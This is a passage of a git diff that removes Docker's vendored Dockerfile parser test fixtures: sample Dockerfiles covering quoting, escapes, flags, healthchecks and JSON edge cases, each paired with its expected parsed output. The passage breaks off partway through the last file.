-RUN cd /usr/local/lvm2 && ./configure --enable-static_link && make device-mapper && make install_device-mapper -# see https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL - -# Install Go -RUN curl -sSL https://golang.org/dl/go1.3.src.tar.gz | tar -v -C /usr/local -xz -ENV PATH /usr/local/go/bin:$PATH -ENV GOPATH /go:/go/src/github.com/docker/docker/vendor -RUN cd /usr/local/go/src && ./make.bash --no-clean 2>&1 - -# Compile Go for cross compilation -ENV DOCKER_CROSSPLATFORMS \ - linux/386 linux/arm \ - darwin/amd64 darwin/386 \ - freebsd/amd64 freebsd/386 freebsd/arm -# (set an explicit GOARM of 5 for maximum compatibility) -ENV GOARM 5 -RUN cd /usr/local/go/src && bash -xc 'for platform in $DOCKER_CROSSPLATFORMS; do GOOS=${platform%/*} GOARCH=${platform##*/} ./make.bash --no-clean 2>&1; done' - -# Grab Go's cover tool for dead-simple code coverage testing -RUN go get golang.org/x/tools/cmd/cover - -# TODO replace FPM with some very minimal debhelper stuff -RUN gem install --no-rdoc --no-ri fpm --version 1.0.2 - -# Get the "busybox" image source so we can build locally instead of pulling -RUN git clone -b buildroot-2014.02 https://github.com/jpetazzo/docker-busybox.git /docker-busybox - -# Setup s3cmd config -RUN /bin/echo -e '[default]\naccess_key=$AWS_ACCESS_KEY\nsecret_key=$AWS_SECRET_KEY' > /.s3cfg - -# Set user.email so crosbymichael's in-container merge commits go smoothly -RUN git config --global user.email 'docker-dummy@example.com' - -# Add an unprivileged user to be used for tests which need it -RUN groupadd -r docker -RUN useradd --create-home --gid docker unprivilegeduser - -VOLUME /var/lib/docker -WORKDIR /go/src/github.com/docker/docker -ENV DOCKER_BUILDTAGS apparmor selinux - -# Wrap all commands in the "docker-in-docker" script to allow nested containers -ENTRYPOINT ["hack/dind"] - -# Upload docker source -COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result deleted file mode 100644 index d032f9bac4..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result +++ /dev/null @@ -1,24 +0,0 @@ -(from "ubuntu:14.04") -(maintainer "Tianon Gravi (@tianon)") -(run "apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -yq \tapt-utils \taufs-tools \tautomake \tbtrfs-tools \tbuild-essential \tcurl \tdpkg-sig \tgit \tiptables \tlibapparmor-dev \tlibcap-dev \tlibsqlite3-dev \tmercurial \tpandoc \tparallel \treprepro \truby1.9.1 \truby1.9.1-dev \ts3cmd=1.1.0* \t--no-install-recommends") -(run "git clone --no-checkout https://git.fedorahosted.org/git/lvm2.git /usr/local/lvm2 && cd /usr/local/lvm2 && git checkout -q v2_02_103") -(run "cd /usr/local/lvm2 && ./configure --enable-static_link && make device-mapper && make install_device-mapper") -(run "curl -sSL https://golang.org/dl/go1.3.src.tar.gz | tar -v -C /usr/local -xz") -(env "PATH" "/usr/local/go/bin:$PATH") -(env "GOPATH" "/go:/go/src/github.com/docker/docker/vendor") -(run "cd /usr/local/go/src && ./make.bash --no-clean 2>&1") -(env "DOCKER_CROSSPLATFORMS" "linux/386 linux/arm \tdarwin/amd64 darwin/386 \tfreebsd/amd64 freebsd/386 freebsd/arm") -(env "GOARM" "5") -(run "cd /usr/local/go/src && bash -xc 'for platform in $DOCKER_CROSSPLATFORMS; do GOOS=${platform%/*} GOARCH=${platform##*/} ./make.bash --no-clean 2>&1; done'") -(run "go get golang.org/x/tools/cmd/cover") -(run "gem install --no-rdoc --no-ri fpm --version 1.0.2") -(run "git clone -b buildroot-2014.02 https://github.com/jpetazzo/docker-busybox.git /docker-busybox") -(run "/bin/echo -e '[default]\\naccess_key=$AWS_ACCESS_KEY\\nsecret_key=$AWS_SECRET_KEY' > /.s3cfg") -(run "git config --global user.email 'docker-dummy@example.com'") -(run "groupadd -r docker") -(run "useradd --create-home --gid docker unprivilegeduser") -(volume "/var/lib/docker") -(workdir "/go/src/github.com/docker/docker") -(env "DOCKER_BUILDTAGS" "apparmor selinux") -(entrypoint "hack/dind") -(copy "." "/go/src/github.com/docker/docker") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile deleted file mode 100644 index 08fa18acec..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile +++ /dev/null @@ -1,23 +0,0 @@ -FROM ubuntu -ENV name value -ENV name=value -ENV name=value name2=value2 -ENV name="value value1" -ENV name=value\ value2 -ENV name="value'quote space'value2" -ENV name='value"double quote"value2' -ENV name=value\ value2 name2=value2\ value3 -ENV name="a\"b" -ENV name="a\'b" -ENV name='a\'b' -ENV name='a\'b'' -ENV name='a\"b' -ENV name="''" -# don't put anything after the next line - it must be the last line of the -# Dockerfile and it must end with \ -ENV name=value \ - name1=value1 \ - name2="value2a \ - value2b" \ - name3="value3a\n\"value3b\"" \ - name4="value4a\\nvalue4b" \ diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result deleted file mode 100644 index ba0a6dd7cb..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result +++ /dev/null @@ -1,16 +0,0 @@ -(from "ubuntu") -(env "name" "value") -(env "name" "value") -(env "name" "value" "name2" "value2") -(env "name" "\"value value1\"") -(env "name" "value\\ value2") -(env "name" "\"value'quote space'value2\"") -(env "name" "'value\"double quote\"value2'") -(env "name" "value\\ value2" "name2" "value2\\ value3") -(env "name" "\"a\\\"b\"") -(env "name" "\"a\\'b\"") -(env "name" "'a\\'b'") -(env "name" "'a\\'b''") -(env "name" "'a\\\"b'") -(env "name" "\"''\"") -(env "name" "value" "name1" "value1" "name2" "\"value2a value2b\"" "name3" "\"value3a\\n\\\"value3b\\\"\"" "name4" "\"value4a\\\\nvalue4b\"") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile deleted file mode 100644 index 6def7efdcd..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile +++ /dev/null @@ -1,9 +0,0 @@ -# Comment here. Should not be looking for the following parser directive. -# Hence the following line will be ignored, and the subsequent backslash -# continuation will be the default. -# escape = ` - -FROM image -MAINTAINER foo@bar.com -ENV GOPATH \ -\go \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result deleted file mode 100644 index 21522a880b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result +++ /dev/null @@ -1,3 +0,0 @@ -(from "image") -(maintainer "foo@bar.com") -(env "GOPATH" "\\go") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile deleted file mode 100644 index 08a8cc4326..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile +++ /dev/null @@ -1,7 +0,0 @@ -# escape = `` -# There is no white space line after the directives. This still succeeds, but goes -# against best practices. -FROM image -MAINTAINER foo@bar.com -ENV GOPATH ` -\go \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result deleted file mode 100644 index 21522a880b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result +++ /dev/null @@ -1,3 +0,0 @@ -(from "image") -(maintainer "foo@bar.com") -(env "GOPATH" "\\go") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile deleted file mode 100644 index ef30414a5e..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile +++ /dev/null @@ -1,6 +0,0 @@ -#escape = ` - -FROM image -MAINTAINER foo@bar.com -ENV GOPATH ` -\go \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result deleted file mode 100644 index 21522a880b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result +++ /dev/null @@ -1,3 +0,0 @@ -(from "image") -(maintainer "foo@bar.com") -(env "GOPATH" "\\go") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile deleted file mode 100644 index 1ffb17ef08..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile +++ /dev/null @@ -1,14 +0,0 @@ -FROM ubuntu:14.04 -MAINTAINER Erik \\Hollensbe \" - -RUN apt-get \update && \ - apt-get \"install znc -y -ADD \conf\\" /.znc - -RUN foo \ - -bar \ - -baz - -CMD [ "\/usr\\\"/bin/znc", "-f", "-r" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result deleted file mode 100644 index 13e409cb1a..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result +++ /dev/null @@ -1,6 +0,0 @@ -(from "ubuntu:14.04") -(maintainer "Erik \\\\Hollensbe \\\"") -(run "apt-get \\update && apt-get \\\"install znc -y") -(add "\\conf\\\\\"" "/.znc") -(run "foo bar baz") -(cmd "/usr\\\"/bin/znc" "-f" "-r") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile deleted file mode 100644 index 2418e0f069..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile +++ /dev/null @@ -1,10 +0,0 @@ -FROM scratch -COPY foo /tmp/ -COPY --user=me foo /tmp/ -COPY --doit=true foo /tmp/ -COPY --user=me --doit=true foo /tmp/ -COPY --doit=true -- foo /tmp/ -COPY -- foo /tmp/ -CMD --doit [ "a", "b" ] -CMD --doit=true -- [ "a", "b" ] -CMD --doit -- [ ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result deleted file mode 100644 index 4578f4cba4..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result +++ /dev/null @@ -1,10 +0,0 @@ -(from "scratch") -(copy "foo" "/tmp/") -(copy ["--user=me"] "foo" "/tmp/") -(copy ["--doit=true"] "foo" "/tmp/") -(copy ["--user=me" "--doit=true"] "foo" "/tmp/") -(copy ["--doit=true"] "foo" "/tmp/") -(copy "foo" "/tmp/") -(cmd ["--doit"] "a" "b") -(cmd ["--doit=true"] "a" "b") -(cmd ["--doit"]) diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile deleted file mode 100644 index 081e442882..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile +++ /dev/null @@ -1,10 +0,0 @@ -FROM debian -ADD check.sh main.sh /app/ -CMD /app/main.sh -HEALTHCHECK -HEALTHCHECK --interval=5s --timeout=3s --retries=3 \ - CMD /app/check.sh --quiet -HEALTHCHECK CMD -HEALTHCHECK CMD a b -HEALTHCHECK --timeout=3s CMD ["foo"] -HEALTHCHECK CONNECT TCP 7000 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result deleted file mode 100644 index 092924f88c..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result +++ /dev/null @@ -1,9 +0,0 @@ -(from "debian") -(add "check.sh" "main.sh" "/app/") -(cmd "/app/main.sh") -(healthcheck) -(healthcheck ["--interval=5s" "--timeout=3s" "--retries=3"] "CMD" "/app/check.sh --quiet") -(healthcheck "CMD") -(healthcheck "CMD" "a b") -(healthcheck ["--timeout=3s"] "CMD" "foo") -(healthcheck "CONNECT" "TCP 7000") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile deleted file mode 100644 index 587fb9b54b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile +++ /dev/null @@ -1,15 +0,0 @@ -FROM ubuntu:14.04 - -RUN apt-get update && apt-get install wget -y -RUN wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb -RUN dpkg -i influxdb_latest_amd64.deb -RUN rm -r /opt/influxdb/shared - -VOLUME /opt/influxdb/shared - -CMD /usr/bin/influxdb --pidfile /var/run/influxdb.pid -config /opt/influxdb/shared/config.toml - -EXPOSE 8083 -EXPOSE 8086 -EXPOSE 8090 -EXPOSE 8099 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result deleted file mode 100644 index 0998e87e63..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result +++ /dev/null @@ -1,11 +0,0 @@ -(from "ubuntu:14.04") -(run "apt-get update && apt-get install wget -y") -(run "wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb") -(run "dpkg -i influxdb_latest_amd64.deb") -(run "rm -r /opt/influxdb/shared") -(volume "/opt/influxdb/shared") -(cmd "/usr/bin/influxdb --pidfile /var/run/influxdb.pid -config /opt/influxdb/shared/config.toml") -(expose "8083") -(expose "8086") -(expose "8090") -(expose "8099") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile deleted file mode 100644 index 39fe27d99c..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -CMD "[\"echo\", \"Phew, I just managed to escaped those double quotes\"]" diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result deleted file mode 100644 index afc220c2a7..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result +++ /dev/null @@ -1 +0,0 @@ -(cmd "\"[\\\"echo\\\", \\\"Phew, I just managed to escaped those double quotes\\\"]\"") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile deleted file mode 100644 index eaae081a06..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -CMD '["echo", "Well, JSON in a string is JSON too?"]' diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result deleted file mode 100644 index 484804e2b2..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result +++ /dev/null @@ -1 +0,0 @@ -(cmd "'[\"echo\", \"Well, JSON in a string is JSON too?\"]'") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile deleted file mode 100644 index c3ac63c07a..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -CMD ['echo','single quotes are invalid JSON'] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result deleted file mode 100644 index 6147891207..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result +++ /dev/null @@ -1 +0,0 @@ -(cmd "['echo','single quotes are invalid JSON']") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile deleted file mode 100644 index 5fd4afa522..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -CMD ["echo", "Please, close the brackets when you're done" diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result deleted file mode 100644 index 1ffbb8ff85..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result +++ /dev/null @@ -1 +0,0 @@ -(cmd "[\"echo\", \"Please, close the brackets when you're done\"") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile deleted file mode 100644 index 30cc4bb48f..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -CMD ["echo", "look ma, no quote!] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result deleted file mode 100644 index 32048147b5..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result +++ /dev/null @@ -1 +0,0 @@ -(cmd "[\"echo\", \"look ma, no quote!]") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile deleted file mode 100644 index a586917110..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile +++ /dev/null @@ -1,8 +0,0 @@ -CMD [] -CMD [""] -CMD ["a"] -CMD ["a","b"] -CMD [ "a", "b" ] -CMD [ "a", "b" ] -CMD [ "a", "b" ] -CMD ["abc 123", "♥", "☃", "\" \\ \/ \b \f \n \r \t \u0000"] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result deleted file mode 100644 index c6553e6e1a..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result +++ /dev/null @@ -1,8 +0,0 @@ -(cmd) -(cmd "") -(cmd "a") -(cmd "a" "b") -(cmd "a" "b") -(cmd "a" "b") -(cmd "a" "b") -(cmd "abc 123" "♥" "☃" "\" \\ / \b \f \n \r \t \x00") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile deleted file mode 100644 index 35f9c24aa6..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile +++ /dev/null @@ -1,7 +0,0 @@ -FROM ubuntu:14.04 -MAINTAINER James Turnbull "james@example.com" -ENV REFRESHED_AT 2014-06-01 -RUN apt-get update -RUN apt-get -y install redis-server redis-tools -EXPOSE 6379 -ENTRYPOINT [ "/usr/bin/redis-server" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result deleted file mode 100644 index b5ac6fe445..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result +++ /dev/null @@ -1,7 +0,0 @@ -(from "ubuntu:14.04") -(maintainer "James Turnbull \"james@example.com\"") -(env "REFRESHED_AT" "2014-06-01") -(run "apt-get update") -(run "apt-get -y install redis-server redis-tools") -(expose "6379") -(entrypoint "/usr/bin/redis-server") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile deleted file mode 100644 index 188395fe83..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile +++ /dev/null @@ -1,48 +0,0 @@ -FROM busybox:buildroot-2014.02 - -MAINTAINER docker - -ONBUILD RUN ["echo", "test"] -ONBUILD RUN echo test -ONBUILD COPY . / - - -# RUN Commands \ -# linebreak in comment \ -RUN ["ls", "-la"] -RUN ["echo", "'1234'"] -RUN echo "1234" -RUN echo 1234 -RUN echo '1234' && \ - echo "456" && \ - echo 789 -RUN sh -c 'echo root:testpass \ - > /tmp/passwd' -RUN mkdir -p /test /test2 /test3/test - -# ENV \ -ENV SCUBA 1 DUBA 3 -ENV SCUBA "1 DUBA 3" - -# CMD \ -CMD ["echo", "test"] -CMD echo test -CMD echo "test" -CMD echo 'test' -CMD echo 'test' | wc - - -#EXPOSE\ -EXPOSE 3000 -EXPOSE 9000 5000 6000 - -USER docker -USER docker:root - -VOLUME ["/test"] -VOLUME ["/test", "/test2"] -VOLUME /test3 - -WORKDIR /test - -ADD . / -COPY . copy diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result deleted file mode 100644 index 6f7d57a396..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result +++ /dev/null @@ -1,29 +0,0 @@ -(from "busybox:buildroot-2014.02") -(maintainer "docker ") -(onbuild (run "echo" "test")) -(onbuild (run "echo test")) -(onbuild (copy "." "/")) -(run "ls" "-la") -(run "echo" "'1234'") -(run "echo \"1234\"") -(run "echo 1234") -(run "echo '1234' && echo \"456\" && echo 789") -(run "sh -c 'echo root:testpass > /tmp/passwd'") -(run "mkdir -p /test /test2 /test3/test") -(env "SCUBA" "1 DUBA 3") -(env "SCUBA" "\"1 DUBA 3\"") -(cmd "echo" "test") -(cmd "echo test") -(cmd "echo \"test\"") -(cmd "echo 'test'") -(cmd "echo 'test' | wc -") -(expose "3000") -(expose "9000" "5000" "6000") -(user "docker") -(user "docker:root") -(volume "/test") -(volume "/test" "/test2") -(volume "/test3") -(workdir "/test") -(add "." "/") -(copy "." "copy") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile deleted file mode 100644 index f64c1168c1..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -FROM ubuntu:14.04 - -RUN apt-get update -qy && apt-get install mutt offlineimap vim-nox abook elinks curl tmux cron zsh -y -ADD .muttrc / -ADD .offlineimaprc / -ADD .tmux.conf / -ADD mutt /.mutt -ADD vim /.vim -ADD vimrc /.vimrc -ADD crontab /etc/crontab -RUN chmod 644 /etc/crontab -RUN mkdir /Mail -RUN mkdir /.offlineimap -RUN echo "export TERM=screen-256color" >/.zshenv - -CMD setsid cron; tmux -2 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result deleted file mode 100644 index a0efcf04b6..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result +++ /dev/null @@ -1,14 +0,0 @@ -(from "ubuntu:14.04") -(run "apt-get update -qy && apt-get install mutt offlineimap vim-nox abook elinks curl tmux cron zsh -y") -(add ".muttrc" "/") -(add ".offlineimaprc" "/") -(add ".tmux.conf" "/") -(add "mutt" "/.mutt") -(add "vim" "/.vim") -(add "vimrc" "/.vimrc") -(add "crontab" "/etc/crontab") -(run "chmod 644 /etc/crontab") -(run "mkdir /Mail") -(run "mkdir /.offlineimap") -(run "echo \"export TERM=screen-256color\" >/.zshenv") -(cmd "setsid cron; tmux -2") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile deleted file mode 100644 index 57bb5976a3..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile +++ /dev/null @@ -1,3 +0,0 @@ -FROM foo - -VOLUME /opt/nagios/var /opt/nagios/etc /opt/nagios/libexec /var/log/apache2 /usr/share/snmp/mibs diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result deleted file mode 100644 index 18dbdeeaa0..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result +++ /dev/null @@ -1,2 +0,0 @@ -(from "foo") -(volume "/opt/nagios/var" "/opt/nagios/etc" "/opt/nagios/libexec" "/var/log/apache2" "/usr/share/snmp/mibs") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile deleted file mode 100644 index 5b9ec06a6c..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile +++ /dev/null @@ -1,7 +0,0 @@ -FROM ubuntu:14.04 - -RUN apt-get update && apt-get install libcap2-bin mumble-server -y - -ADD ./mumble-server.ini /etc/mumble-server.ini - -CMD /usr/sbin/murmurd diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result deleted file mode 100644 index a0036a943e..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result +++ /dev/null @@ -1,4 +0,0 @@ -(from "ubuntu:14.04") -(run "apt-get update && apt-get install libcap2-bin mumble-server -y") -(add "./mumble-server.ini" "/etc/mumble-server.ini") -(cmd "/usr/sbin/murmurd") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile deleted file mode 100644 index bf8368e1ca..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile +++ /dev/null @@ -1,14 +0,0 @@ -FROM ubuntu:14.04 -MAINTAINER Erik Hollensbe - -RUN apt-get update && apt-get install nginx-full -y -RUN rm -rf /etc/nginx -ADD etc /etc/nginx -RUN chown -R root:root /etc/nginx -RUN /usr/sbin/nginx -qt -RUN mkdir /www - -CMD ["/usr/sbin/nginx"] - -VOLUME /www -EXPOSE 80 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result deleted file mode 100644 index 56ddb6f258..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result +++ /dev/null @@ -1,11 +0,0 @@ -(from "ubuntu:14.04") -(maintainer "Erik Hollensbe ") -(run "apt-get update && apt-get install nginx-full -y") -(run "rm -rf /etc/nginx") -(add "etc" "/etc/nginx") -(run "chown -R root:root /etc/nginx") -(run "/usr/sbin/nginx -qt") -(run "mkdir /www") -(cmd "/usr/sbin/nginx") -(volume "/www") -(expose "80") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile deleted file mode 100644 index 72b79bdd7d..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile +++ /dev/null @@ -1,23 +0,0 @@ -FROM 